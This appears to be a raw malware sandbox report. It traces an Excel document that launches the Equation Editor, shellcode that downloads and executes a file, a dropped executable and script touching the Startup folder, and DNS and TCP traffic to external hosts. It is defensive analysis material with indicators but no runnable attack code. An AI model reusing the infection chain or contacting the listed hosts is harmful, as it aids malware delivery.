Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_010668EE FindFirstFileW,FindClose,	8_2_010668EE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0105D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_0105D076
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0105D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_0105D3A9
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0106979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_0106979D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01069642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_01069642
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01069B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	8_2_01069B2B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01065C97 FindFirstFileW,FindNextFileW,FindClose,	8_2_01065C97
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0139DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	11_2_0139DBBE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0136C2A2 FindFirstFileExW,	11_2_0136C2A2
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	11_2_013A698F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A68EE FindFirstFileW,FindClose,	11_2_013A68EE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0139D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_0139D076
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0139D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_0139D3A9
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_013A979D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_013A9642
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	11_2_013A9B2B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A5C97 FindFirstFileW,FindNextFileW,FindClose,	11_2_013A5C97

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035306F5 WinExec,ExitProcess,	2_2_035306F5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03530715 ExitProcess,	2_2_03530715
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03530631 LoadLibraryW,	2_2_03530631
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035306AA URLDownloadToFileW,	2_2_035306AA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0353064B URLDownloadToFileW,	2_2_0353064B

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	9_2_003DDC68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A87110h	9_2_00A86CF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A86B19h	9_2_00A86858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A84CA5h	9_2_00A84AB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A8562Fh	9_2_00A84AB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A85999h	9_2_00A856D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_00A83FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A87110h	9_2_00A86CE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A87110h	9_2_00A8703F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A8F979h	9_2_00A8F6D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A8F0C9h	9_2_00A8EE21
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A8F521h	9_2_00A8F279
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A86259h	9_2_00A85FA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A866B9h	9_2_00A863F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A8FDD1h	9_2_00A8FB29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A85DF9h	9_2_00A85B47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D24869h	9_2_00D245C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D20B99h	9_2_00D208F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D218A1h	9_2_00D215F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D2A18Ah	9_2_00D29EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D2AE91h	9_2_00D2ABE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D2AA39h	9_2_00D2A790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D20741h	9_2_00D20498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D2B7D5h	9_2_00D2B498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D22E59h	9_2_00D22BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D29459h	9_2_00D291B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D23B61h	9_2_00D238B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D21449h	9_2_00D211A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D22151h	9_2_00D21EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D28751h	9_2_00D284A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D21CF9h	9_2_00D21A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D22A01h	9_2_00D22758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	9_2_00D26258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D29001h	9_2_00D28D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D202E9h	9_2_00D20040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D2B2E9h	9_2_00D2B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	9_2_00D2624A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D20FF1h	9_2_00D20D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D23709h	9_2_00D23460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D29D09h	9_2_00D29A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D24411h	9_2_00D24168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D23FB9h	9_2_00D23D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D225A9h	9_2_00D22300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D28BA9h	9_2_00D28900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D232B1h	9_2_00D23008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D298B1h	9_2_00D29608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D2A5E1h	9_2_00D2A338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D282D1h	9_2_00D28028

Potential document exploit detected (performs DNS queries)

Source: global traffic	DNS query: name: baitalasma.com
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org

Potential document exploit detected (performs HTTP gets)

Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 38.242.255.115:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 158.101.44.242:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 158.101.44.242:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 158.101.44.242:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 158.101.44.242:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 158.101.44.242:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 158.101.44.242:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
